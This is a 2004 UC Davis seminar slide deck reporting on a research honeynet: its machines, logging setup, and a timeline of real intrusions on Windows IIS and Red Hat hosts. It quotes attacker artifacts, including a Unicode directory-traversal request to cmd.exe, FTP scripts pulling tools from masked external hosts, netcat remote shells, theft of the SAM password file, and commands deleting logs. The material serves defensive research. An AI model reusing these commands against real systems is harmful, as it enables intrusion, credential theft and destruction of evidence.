Title: UCDPromia Honeynet Project UC Davis Security Lab Seminar April 28, 2004 Adam Carlson email: ajcarlso
1UCD/Promia Honeynet ProjectUC Davis Security
Lab SeminarApril 28, 2004Adam Carlsonemail
ajcarlson AT ucdavis.edu
2What is a honeypot/honeynet?
- No widely accepted definition
- Lance Spitzner defines a honeypot as... an
information system resource whose value lies in
unauthorized or illicit use of that resource.1 - A honeynet is a type of honeypot designed for
research. - 1) A honeynet is a network of multiple systems
- 2) All of the systems are real
- 1http//www.governmentsecurity.org/articles/Honeyp
otsDefinitionsandValueofHoneypots.php
3Why is a honeynet useful?
- Not meant to be used
- Less traffic to inspect
- No privacy issues
- Can simulate more complex network
- Proactive rather than reactive
- Tests incident response
4Promia/UCD honeynet overview
- Currently 4 honeynet machines
- HP-1 Red Hat 9.0 Workstation Install
- HP-2 Red Hat 7.2 Server Install
- HP-3 Windows 2000 Server
- HP-4 Windows NT Server ...Connected via a
sensor (HP-Sensor) running Red Hat 9.0
5Configuration Specifics
- HP-1 Red Hat 9.0
- Configuration
- Workstation install
- Services
- SSH
- Syslog
- FTP
- HP-2 Red Hat 7.2
- Configuration
- Server install
- Services
- SSH
- Telnet
- Apache
- mySQL
- BIND
- FTP
6- HP-3 Windows 2000 Server
- Configuration
- Default install with Service Pack 1
- Services
- IIS 5.0 Webserver
- IIS FTP Server
- WinVNC Virtual Network Computing server
- HP-4 Windows NT Server
- Configuration
- Default install with Service Pack 4
- Services
- IIS 3.0 Webserver
- IIS FTP Server
- WinVNC Virtual Network Computing server
7Data Capture Methods
- Windows
- Comlog command line logging utility
- Evtsys Event Log to Syslog utility
- IIS logs
- Tcpdump traffic
- New Sebek for Windows
8- Linux
- Sebek Kernel Module
- Remote syslog server
- Tcpdump traffic
- Tripwire
9- Sensor Configuration
- Red Hat 9.0
- Snort 2.0 Snort-inline patch
- ACID(Analysis Console for Intrusion Databases)
mySQL - Bridge-utils for ethernet bridging
- OpenSSH
10Initial Results
- Brought online on June 19, 2003
- 3 initial honeypot machines began receiving
probes within 40 minutes of being online - Suffered chronic worm infestation which resulted
in 300-400 megabyte tcpdump files - Patched against worms and created a fast and easy
method for restoring computers
11What took you so long?
- First attack came on June 21 at 339 pm, about 76
hours after the honeynet was brought on line. - Directed at Windows NT IIS web server using
directory traversal URL. - Uploaded privilege escalation tool named
ErunAs2X.exe, remote shell tool nc.exe, and
Firedaemon.exe - Worm infestation forced us to take down system
and reinstall the OS.
12- Next attack was on July 3, 2003
- Directed at vulnerability in Windows 2000
WebDAV(Web-based Distributed Authoring and
Versioning) component of the IIS Web server - The intruders set up a rogue ftp server listening
on port 2687 and used it to upload software and
music files. - Attempted to make changes to Windows that we have
been unable to explain
13Why is this intruder trying to update our system
at 1226 am? ... dr-x------ 1 root root
258048 Jul 5 0039 NtServicePackUninstall d
r-x------ 1 root root 4096 Jul 5
0038 Installer -r-------- 1 root root
607 Jul 5 0026 Q815021.log -r-------- 1
root root 1518 Jul 5 0021
OEWABLog.txt dr-x------ 1 root root
4096 Jul 2 2037 Debug ... Q815021.log Servi
ce Pack started with following command line
CheckSystem ServicePack version
Mismatch DoInstallation CheckSystem Failed
0xf076 Setup has detected that the version
of the Service Pack installed on your system is
lower than what is necessary to apply this
hotfix. At minimum, you must have Service Pack 2
installed. Message displayed to the user
Setup has detected that the version of the
Service Pack installed on your system is lower
than what is necessary to apply this hotfix. At
minimum, you must have Service Pack 2
installed. User Input OK
14 - Sometime on July 5th the system crashed and was
unable to boot back into a functioning state. - System taken offline and restored but we did not
correctly diagnose the attack vector - Attackers able to compromise system only 3 hours
after it is brought back online - Again set up FTP server and uploaded software and
music files - Continued to compromise and use the machine until
August 26th, when the WebDAV vulnerability was
patched against.
15Who doesnt love anonymous ftp with write
privileges?
- Anonymous connection made to Windows NT FTP
server on July 5th at 215 am - Checks for write permission, then uploads a file
named 1mbtest.ptf - Removed anonymous write permissions before
attacker could return
16Thanks Unicode!
- On July 19th at 1117 pm our Windows NT server
became the target of the next attack. - The IIS server running on the honeynet machine
was vulnerable to a directory traversal attack
using the Unicode encoding system - GET /scripts/..255c..255c../winnt/system32/cmd.e
xe?/cdirc\ HTTP/1.0 - The attacker lists the contents of all drives,
then creates an ftp script file - open xxx.235.254.67
- steve
- jackson
- binary
- get lsass.exe
- get serv-u.ini
- get command.exe
- get kill.exe
17- FTP server did not accept username/password
- Eventually able to get a remote shell on port 99
using uploaded nc.exe - Attacker then downloads p.exe, httpodbc.dll,
svchost.exe and serv-u.ini - Starts Serv-U FTP daemon listing on port 1020
using svchost.exe and serv-u.ini - Uploads more tools via FTP before looking around
filesystem - Discovers hidden directory with our honeypot
forensics tools - Downloads all of the tools and then disconnects
18- Come back briefly 2 times in the next week to
check the directories they had created - 220 am on July 29th upload and install a
Half-Life Counterstrike game server. Attempt to
hide directory and install game server as a
service. - At 330 am the game server is up and running with
the title Super Fast California Server.
Numerous clients immediately start connecting to
the server. - System taken offline at 515pm
19HTTPS more secure right?
- Next attack came July 31st and was directed at
Red Hat Linux 7.2 OpenSSL module used by Apache
Web Server - Began with a TCP connection to port 443
- Attacker then sent a bad HTTP request to port 80
resulting in a 400 Bad Request message in
response - A number of connections are made to port 443 that
contain the exploit targeting the KEY_ARG
vulnerability found in the installed version of
OpenSSL - Execute a privilege elevation exploit and begin
downloading root kit tools from a remote FTP
server - Install rk rootkit and hidden SSH server
listening on port 1212
20- Uploaded selena.tgz which contained a fast and
simple port 443 scanner utility - Attempted to scan several class B networks for
machines with port 443 open. - Many connections observed over the next few days
- Download and install psyBNC IRC place holder
program - System taken offline on August 5th to make image
of harddrive. Machine would not reboot.
21And now more fun with IIS
- Next attack targeted Microsoft IIS Server WebDAV
SEARCH overflow vulnerability - Began with a series of Echo Ping requests being
sent to target at 1156 pm on Sept. 8, 2003. - This was followed by a SEARCH request that
exploited a vulnerability in the IIS server
WebDAV capabilities, resulting in a remote shell
listening on port 1055 - Attacker creates an FTP script
- open xxx.xxx.143.233
- microsoft
- microsoft
- bin
- get "ntoskrnl.exe" c\winnt\system32\cache\ntoskr
nl.exe - get "settingslol.jpg" c\winnt\system32\cache\set
tingslol.jpg - get "iislog.exe" c\winnt\system32\cache\iislog.e
xe - bye
22- ntoskrnl.exe contains Serv-U FTP daemon
- settingslol.jpg contains Serv-U configuration
file - iislog.exe contains a program that will delete
IIS Logs and kill processes on a Windows machine - Attacker installs FTP server to listen on port
2687 and uploads more tools AdmDll.dll,
iislog.exe, nc.exe, and r_server.exe. - Creates remote shell using nc.exe listening on
port 1234 - Repeatedly attempts to add a new user to system
but unsuccessful due to password policy.
23- They then install the r_server.exe program as a
service. r_server is the server component of the
Remote Administrator (RA) utility
(http//www.radmin.com/download/default.html) - Make r_server connection from 1213 am to 1224
am - Finally after 15 minutes and over 40
username/password combination the attacker gives
up on attempting to add an account. - Instead adds built in IWAM_HP-3 account to the
administrator group and disconnects.
24Too bad our hard drives come from the bargain
barn
- Connection is made to Serv-U FTP server later
that day at 1109 am. - Attacker immediately goes to his tools directory
and deletes all of the uploaded files except for
the FTP server. - At 1113 am a connection is made from a different
IP address. The attacker uploads and starts an
FTP script that will download 7 DivX encoded
movies. - After the download starts, the attacker
disconnects. - Unfortunately there was only enough free space
for one of the movies before the hard drive
became completely filled.
25- The full hard disk degraded performance and the
system was taken offline at 725pm on September
9th. - The movie files were deleted but the rogue FTP
server was left installed. The system was put
back online at 1100 pm on September 15th. - Attackers returned at 1145 pm on September 16th
with a connection to the ftp server. - The attackers again uploaded a number of tools
including nc.exe, r_server.exe, and iislog.exe. - Two more connections are made at 335 am and
1122 pm on September 17th - Because no new activity was being recorded,
system was taken offline and patched against
web-DAV vulnerability.
26You can always count on the classics
- The next attack targeted the wu-ftpd FTP server
running on the Red Hat 7.2 machine - An anonymous connection is made to the FTP
server. A connection containing an exploit of
the fb_realpath() off-by-one vulnerability is
then made. - The exploit creates a remote shell and the
attackers quickly connect - The intruders download and install the shkit v4
rootkit. The rootkit installs trojaned versions
of ifconfig, ps, ls, netstat, find, top, lsof,
slocate, dir, md5sum, syslogd, pstree and login.
Also installs a covert SSH daemon listening on
port 10. - Attackers connect to the hidden SSH daemon and
download the SucKIT v1.3b kernel-based rootkit
and the psyBNC IRC bouncer program.
27- Over the next two days the psyBNC IRC program is
used heavily, but little other activity is
observed. - Decision was made to take the system offline
because it looked as if it was going to be used
for file distribution.
28Saving the best for last
- Last intrusion began at 1145 pm on January 18th
- Directed at Windows NT MSADC component of IIS
- Attack began with a series of HTTP GET requests,
attempting a directory traversal using the
UNICODE encoding scheme(similar to earlier
attack). - Attacker then did a port scan of ports 1-3000
- Connects to anonymous FTP server and lists drive
contents, then disconnects - Attacker spends the next 20 minutes attacking IIS
attempting to open a command shell - At 1219 am the attacker issued a POST request to
the MSADC component of the IIS web server. The
POST was successful alerting the attacker that
the MSADC component was installed.
29- Attacker exploited MSADC vulnerability and at
115 am issued a command that copied the password
file C\winnt\repair\sam._ to the public web
server directory, where it was then downloaded. - The attacker then set up a rogue ftp server on
port 1020 and a remote shell on port 99. - Connected to the rogue ftp server, and uploaded a
file named httpdodbc.dll. This was really the
iiscrack exploit written by digitaloffense.net. -
- At 145 am the attacker used MSADC to create a
text file with a list of all files on the system,
which was then downloaded.
30- At 147 am the attacker used MSADC to copy the
original version of cmd.exe, named cm_.exe, to
the IIS web directory. - Then uploaded two programs, winamp and mIRC, as
well as a third file meant to test the target
computers' bandwidth. - At 329 am on January 19th, almost four hours
after the attack began, the intruder closed all
connections, leaving only the rogue ftp server
running. - A new connection was made at 551 pm that same
day. The intruder immediately used the ftp
server to re-open the command shell on port 99. - The attacker then uploaded a few more tools
before attempting to launch a Denial of Service
attack at 607 pm
31- After a few unsuccessful attempts, the attacker
launched the DoS, generating over 2.14 gigabytes
of fragmented IP packets in under 3 minutes. This
attack continued until 950 pm. - An attacker returned at 203 am to the rogue ftp
server and uploaded more files, including the
Half Life game server that we had seen in a
previous intrusion. - The attackers also entered the C\winnt\help\tutor
directory, which was used to keep the ComLog
cmd.exe shell logs. They deleted only the log
files that had recorded their actions. - The attacker then installed the Half-Life server,
rebooted the machine, and disconnected at 248
am. - The next connection was made as 1229 am on
January 22nd. An intruder connected to the rogue
ftp server and uploaded a number of mp3 music
files to the IIS web server directory.
32- Between January 23rd and January 25th a number of
successful requests for the mp3 files were made
from an array of IP addresses - Little other activity is recorded until January
28th when another connection was made and another
Denial of Service attack was launched using the
mIRC program. - Decision was made to take the system offline
January 29th.
33Conclusions
- Yes we will be attacked, 357,233 snort alerts and
counting - Able to gain tcpdump files containing actual
exploits - Collected real attack tools that are being used
in the wild. - (We received a workable exploit for the windows
DCOM RPC vulnerability only a few months after
the vulnerability surfaced) - Leads to more questions
34... why are they trying to install hardware
drivers at 1130 pm? ... 2003/07/07 213000
284.2 Munged cmdline msiinst.exe
/delayrebootq EXE name C\WINNT\System32\msiinst.
tmp\msiinst.exe The protected system file
(C\WINNT\System32\msi.dll) was successfully
unprotected. The protected system file
(C\WINNT\System32\msihnd.dll) was successfully
unprotected. The protected system file
(C\WINNT\System32\msimsg.dll) was successfully
unprotected. The protected system file
(C\WINNT\System32\msiexec.exe) was successfully
unprotected. 2003/07/07 213535 1332.23 Driver
Install Munged cmdline C\WINNT\system32\wzcsetu
p.exe /i /P EXE name C\WINNT\system32\wzcsetup.e
xe Searching for hardware ID(s)
ms_ndisuio Enumerating files C\WINNT\inf\.inf Fo
und MS_NDISUIO in C\WINNT\inf\ndisuio.inf
Device NDIS Usermode I/O Protocol Driver NDIS
Usermode I/O Protocol Provider Microsoft Mfg
Microsoft Section Install Decorated section
name Install Selected driver installs from
section Install in c\winnt\inf\ndisuio.inf. Chang
ed class GUID of device to 4D36E975-E325-11CE-BFC
1-08002BE10318. Set selected driver. 2003/07/07
213550 1332.86 Driver Install Searching for
hardware ID(s) ms_wzcsvc Enumerating files
C\WINNT\inf\.inf Found MS_WZCSVC in
C\WINNT\inf\netwzc.inf Device Wireless
Configuration Driver Wireless Configuration
Provider Microsoft Mfg Microsoft Section
WZCSVC.ndi Decorated section name
WZCSVC.ndi Selected driver installs from section
WZCSVC.ndi in c\winnt\inf\netwzc.inf. Changed
class GUID of device to 4D36E974-E325-11CE-BFC1-0
8002BE10318. Set selected driver. 2003/07/07
213600 1484.625 Driver Install Munged cmdline
e\f7861adccd4ae\i386\update\update.exe EXE name
e\f7861adccd4ae\i386\update\update.exe Searching
for hardware ID(s) acpi\fixedbutton,fixedbutton
Found ACPI\FixedButton in C\WINNT\INF\machine.inf
Device ACPI Fixed Feature Button Driver ACPI
Fixed Feature Button Provider Microsoft Mfg
(Standard system devices) Section
NO_DRV Decorated section name NO_DRV
35Which logging mechanisms will they go after?
TCP hp-3ftp hp-sensor.ucdavis.ed
u32822 ESTABLISHED TCP hp-3http
xxx.w80-8.abo.wanadoo.fr3938 ESTABLISHED TCP
hp-3http xxx.cs.ucdavis.edu16387
ESTABLISHED TCP hp-3http
xxx.ipt.aol.com4460 ESTABLISHED TCP
hp-3http xxx.ipt.aol.com1825
ESTABLISHED TCP hp-3http
xxx.prodigy.net.mx3201 ESTABLISHED TCP
hp-3http xxx.ppp.tiscali.fr4931
CLOSE_WAIT TCP hp-3http
xxx.18.13.1914598 ESTABLISHED TCP
hp-3http xxx.18.86.784188
ESTABLISHED TCP hp-3http
xxx.19.25.1753023 ESTABLISHED TCP
hp-3http xxx.71.179.1604550
ESTABLISHED TCP hp-31168
hp-4.ucdavis.edunetbios-ssn ESTABLISHED c\W
INNT\system32\spool\prtprocs\w32x86\prntSun Jul
20 011648 2003 services stop evtsys Sun Jul 20
011650 2003 Service evtsys stopped. Sun Jul 20
011650 2003 ... c\WINNT\system32\spool\prtprocs
\w32x86\prntSun Jul 20 011825 2003 rmdir
c\winnt\system32\logfiles /q /s Sun Jul 20
011825 2003 Sun Jul 20 011825 2003
36Future Work
- UCD/Promia Honeynet version 2
- Honeynet goes public
- More realism create a fictitious UC Davis group
- Advertise our presence
- Develop honeynet tools
- Honeytokens
37Thanks!
- Special thanks to Promia for making this happen
- Big thanks to Matt Bishop, Tom Ristenpart, and
Jimmy Zhao for their constant support and help. - Monumental thanks to Brennen Reynolds of
Off-Piste Consulting, who was the original
designer of this project(and my constant partner
in crime).